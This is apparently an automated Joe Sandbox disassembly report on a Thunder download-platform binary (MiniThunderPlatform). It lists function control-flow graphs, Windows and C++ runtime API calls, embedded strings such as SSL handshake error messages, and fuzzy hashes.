??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 418004 call 4170cd ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 1098->1117 1099->1051 1133 4225e9-4225ec call 417df2 1103->1133 1134 4225dd-4225e7 call 417410 1103->1134 1104->1103 1117->1064 1138 4225f1-42261b ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 1133->1138 1134->1138 1138->1033
                                                                                                                                              APIs
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004223D3
                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 004223E7
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422406
                                                                                                                                              • GetLastError.KERNEL32 ref: 00422425
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 0042244F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(80000055), ref: 00422499
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(id.dat), ref: 004224CA
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004224DF
                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(partner,0044818C,80000055,?,00001000,00000000), ref: 0042250A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 0042257C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 00422595
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 004225A7
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 004225BA
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004225FD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 00422613
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00422696
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004226FC
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00422725
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(new memory failed!), ref: 0042283E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 0042287F
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004228A1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@_$??1?$basic_string@CloseHandle$??0?$basic_string@?data@?$basic_string@_$?assign@?$basic_string@?data@?$basic_string@?size@?$basic_string@_CreateErrorLastMutexPrivateProfileStringV01@V12@V12@@Y?$basic_string@_
                                                                                                                                              • String ID: 80000055$80000055$d:\minitp\src\minithunderplatform\src\minithunderplatform\downloadenginemanager.cpp$id.dat$m_pDownloadHandler != NULL$new memory failed!$partner
                                                                                                                                              • API String ID: 3560328190-4013534387
                                                                                                                                              • Opcode ID: 986f56804711b03c73e397735637d0ed4fd007bd5bc1be961d5c07aae9c22e3f
                                                                                                                                              • Instruction ID: aee5c3c6f2a24da616a00a300bf2f9990c53a6ad5f18dc2c1bdde4f1044f440a
                                                                                                                                              • Opcode Fuzzy Hash: 986f56804711b03c73e397735637d0ed4fd007bd5bc1be961d5c07aae9c22e3f
                                                                                                                                              • Instruction Fuzzy Hash: 990261B1D00218DFDB14EB94D985BEEBBB1AF08308F51419EE50577351CB789E84CBAA
                                                                                                                                              Function 1003C190 Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 303COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1202 1003c190-1003c1ce 1203 1003c1d0-1003c1e9 call 100261b0 1202->1203 1204 1003c1ec-1003c1f4 1202->1204 1203->1204 1206 1003c212-1003c217 1204->1206 1207 1003c1f6-1003c20f call 100261b0 1204->1207 1210 1003c230-1003c256 RtlEnterCriticalSection 1206->1210 1211 1003c219-1003c22b call 1003cfe0 1206->1211 1207->1206 1214 1003c274-1003c2b5 call 1004e1d0 call 1004ec20 1210->1214 1215 1003c258-1003c271 call 100261b0 1210->1215 1220 1003c606-1003c62b call 10025980 1211->1220 1226 1003c2b7-1003c2ca call 1003cfe0 1214->1226 1227 1003c2cf-1003c398 call 10038b50 call 100394e0 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z GetTickCount call 10039640 ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@H@Z ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z 1214->1227 1215->1214 1232 1003c5ff-1003c605 RtlLeaveCriticalSection 1226->1232 1237 1003c534-1003c555 ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ 1227->1237 1238 1003c39e-1003c3a4 1227->1238 1232->1220 1239 1003c557 1237->1239 1240 1003c55e-1003c568 inet_addr 1237->1240 1238->1237 1241 1003c3aa-1003c3af 1238->1241 1239->1240 1243 1003c56a-1003c579 call 10010810 1240->1243 1244 1003c57e-1003c5c2 call 10039b70 call 100393a0 1240->1244 1241->1237 1242 1003c3b5-1003c3d6 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z 1241->1242 1242->1237 1245 1003c3dc-1003c3e1 1242->1245 1243->1244 1255 1003c5c4-1003c5dd call 10039540 1244->1255 1256 1003c5df-1003c5e1 call 1003b880 1244->1256 1245->1237 1248 1003c3e7-1003c400 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z 1245->1248 1248->1237 1250 1003c406-1003c40c 1248->1250 1250->1237 1252 1003c412-1003c417 1250->1252 1252->1237 1254 1003c41d-1003c438 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z 1252->1254 1254->1237 1258 1003c43e-1003c443 1254->1258 1255->1232 1260 1003c5e6-1003c5fe call 10039540 1256->1260 1258->1237 1261 1003c449-1003c462 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z 1258->1261 1260->1232 1261->1237 1264 1003c468-1003c46e 1261->1264 1264->1237 1266 1003c474-1003c479 1264->1266 1266->1237 1267 1003c47f-1003c49a ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z 1266->1267 1267->1237 1268 1003c4a0-1003c4a5 1267->1268 1268->1237 1269 1003c4ab-1003c4c4 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z 1268->1269 1269->1237 1270 1003c4c6-1003c4cc 1269->1270 1270->1237 1271 1003c4ce-1003c4d3 1270->1271 1271->1237 1272 1003c4d5-1003c4f0 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z 1271->1272 1272->1237 1273 1003c4f2-1003c4f7 1272->1273 1273->1237 1274 1003c4f9-1003c514 ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z 1273->1274 1274->1237 1275 1003c516-1003c52e ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z 1274->1275 1275->1237
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 1003C240
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1003C5FF
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100261F4
                                                                                                                                                • Part of subcall function 10038B50: RtlEnterCriticalSection.NTDLL(?), ref: 10038B8A
                                                                                                                                                • Part of subcall function 10038B50: RtlLeaveCriticalSection.NTDLL(?), ref: 10038BA7
                                                                                                                                                • Part of subcall function 10038B50: ??3@YAXPAX@Z.MSVCR71(?), ref: 10038BE7
                                                                                                                                                • Part of subcall function 100394E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000002,10242D17,000000FF,1003AABE,00000000,?), ref: 10039500
                                                                                                                                                • Part of subcall function 100394E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1003951D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1003C315
                                                                                                                                              • GetTickCount.KERNEL32 ref: 1003C333
                                                                                                                                                • Part of subcall function 10039640: ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001,00000000,00000000,?,?), ref: 10039669
                                                                                                                                                • Part of subcall function 10039640: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000,?,?), ref: 1003969A
                                                                                                                                                • Part of subcall function 10039640: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 100396A5
                                                                                                                                                • Part of subcall function 10039640: ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100396B4
                                                                                                                                                • Part of subcall function 10039640: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100396FC
                                                                                                                                                • Part of subcall function 10039640: ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 10039713
                                                                                                                                                • Part of subcall function 10039640: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 10039737
                                                                                                                                                • Part of subcall function 10039640: ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 10039775
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@H@Z.MSVCP71(?,00000003,00000001,?,?), ref: 1003C370
                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP71(?), ref: 1003C387
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,?), ref: 1003C3C5
                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP71(?), ref: 1003C3F0
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,0000002E), ref: 1003C427
                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP71(?), ref: 1003C452
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,0000002E), ref: 1003C489
                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP71(?), ref: 1003C4B4
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,0000002E), ref: 1003C4DF
                                                                                                                                              • ??$?5DU?$char_traits@D@std@@@std@@YAAAV?$basic_istream@DU?$char_traits@D@std@@@0@AAV10@AAD@Z.MSVCP71(?,0000002E), ref: 1003C503
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(?,00000006,?,?,?,?,?,?,?,?,?,?), ref: 1003C52E
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 1003C540
                                                                                                                                              • inet_addr.WS2_32(?), ref: 1003C55F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$D@std@@@0@V10@$??$?5??0?$basic_string@??1?$basic_string@V01@V?$basic_istream@$??5?$basic_istream@CriticalSection$V?$basic_string@$??0?$basic_stringstream@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@EnterLeaveV12@$??$?6??3@??6?$basic_ostream@?assign@?$basic_string@?erase@?$basic_string@CountD@2@@1@H_prologTickV01@@V12@@V?$basic_ostream@inet_addr
                                                                                                                                              • String ID: .$.\connect_manager.cpp$operation_ptr$operation_ptr->is_pending()$operation_ptr->operate_handle()$thunder_assert
                                                                                                                                              • API String ID: 2892529491-448779732
                                                                                                                                              • Opcode ID: 96a354738191216a438755716dd35a6bb5446e3b4b29c8acb274d9aa9fdb954d
                                                                                                                                              • Instruction ID: 4502c98bd26b749bc907510b7fbd07085122e3dccc633c2a77dda873a4d72846
                                                                                                                                              • Opcode Fuzzy Hash: 96a354738191216a438755716dd35a6bb5446e3b4b29c8acb274d9aa9fdb954d
                                                                                                                                              • Instruction Fuzzy Hash: DCD1AF751083858FC321CF25C884F9BBBE5FF99705F048A1DE4898B292D730E989CB92
                                                                                                                                              Function 1001EDAF Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1276 1001edaf-1001ee1e call 10025930 call 10025ed0 call 1000104f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 1283 1001ee20-1001ee23 1276->1283 1284 1001ee25 1276->1284 1285 1001ee28-1001ee42 GetPrivateProfileSectionNamesA 1283->1285 1284->1285 1286 1001ef93-1001efee ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 RtlLeaveCriticalSection call 10025980 1285->1286 1287 1001ee48 1285->1287 1289 1001ee49-1001ee75 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 1287->1289 1291 1001ee7b-1001ee7f 1289->1291 1292 1001ef6e-1001ef8c strlen ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1289->1292 1293 1001ee81-1001ee84 1291->1293 1294 1001ee86 1291->1294 1292->1289 1295 1001ef92 1292->1295 1296 1001ee89-1001eeaa GetPrivateProfileSectionA 1293->1296 1294->1296 1295->1286 1296->1292 1297 1001eeb0-1001ef68 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 1001ecd0 call 1001617c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ strlen 1296->1297 1297->1292
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001EDB4
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000010,?,7C3869BF,1001F7E0), ref: 1001EDF0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EE00
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EE10
                                                                                                                                              • GetPrivateProfileSectionNamesA.KERNEL32(?,00005000,?), ref: 1001EE35
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1001EE50
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(_once,00000000), ref: 1001EE67
                                                                                                                                              • GetPrivateProfileSectionA.KERNEL32(?,?,00005000,?), ref: 1001EE97
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1001EEB7
                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003D,00000000), ref: 1001EEC7
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1001EEE3
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,?,?), ref: 1001EF07
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1001EF14
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?), ref: 1001EF44
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EF54
                                                                                                                                              • strlen.MSVCR71(?), ref: 1001EF5B
                                                                                                                                              • strlen.MSVCR71(?), ref: 1001EF6F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EF83
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EFA1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EFB1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001EFC1
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001EFD1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@V12@$Section$?assign@?$basic_string@$CriticalPrivateProfilestrlen$??4?$basic_string@?find@?$basic_string@?find_first_of@?$basic_string@EnterH_prologLeaveNamesV01@V12@@
                                                                                                                                              • String ID: _once
                                                                                                                                              • API String ID: 1618401751-778372043
                                                                                                                                              • Opcode ID: 929c080620e11a60eb257b478adf83091afbc13e86aac8669b411387b773abc7
                                                                                                                                              • Instruction ID: 147a17bfda1b6fa6fc0738ca6fa3150acbe73fbf4a109f60b41553ade623eab4
                                                                                                                                              • Opcode Fuzzy Hash: 929c080620e11a60eb257b478adf83091afbc13e86aac8669b411387b773abc7
                                                                                                                                              • Instruction Fuzzy Hash: 53615B31A0026DDFDB25CB60CD8CBDDB7B8FB1A305F4041D9E50A96181DB746A88CF62
                                                                                                                                              Function 10045160 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 250COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,?), ref: 10045228
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: load security library error), ref: 10045299
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 100452BD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: client create credentials error), ref: 100452D9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 10045301
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 10045427
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 10045436
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: InitializeSecurityContext call error), ref: 10045443
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              • .\AsynSSLSocket.cpp, xrefs: 100451A5, 1004520C
                                                                                                                                              • SSL handshake: load security library error, xrefs: 10045291
                                                                                                                                              • SSL handshake: send data to server error! throw exception, xrefs: 10045420
                                                                                                                                              • SSL handshake: InitializeSecurityContext throw exception, xrefs: 10045470
                                                                                                                                              • SSL handshake: InitializeSecurityContext call error, xrefs: 1004543B
                                                                                                                                              • _operation_ptr == NULL, xrefs: 100451AF
                                                                                                                                              • _connect_op_ptr == NULL, xrefs: 10045216
                                                                                                                                              • SSL handshake: client create credentials error, xrefs: 100452D1
                                                                                                                                              • thunder_assert, xrefs: 100451AA, 10045211
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@ExceptionThrow$??0exception@@AssignH_prologV01@@
                                                                                                                                              • String ID: .\AsynSSLSocket.cpp$SSL handshake: InitializeSecurityContext call error$SSL handshake: InitializeSecurityContext throw exception$SSL handshake: client create credentials error$SSL handshake: load security library error$SSL handshake: send data to server error! throw exception$_connect_op_ptr == NULL$_operation_ptr == NULL$thunder_assert
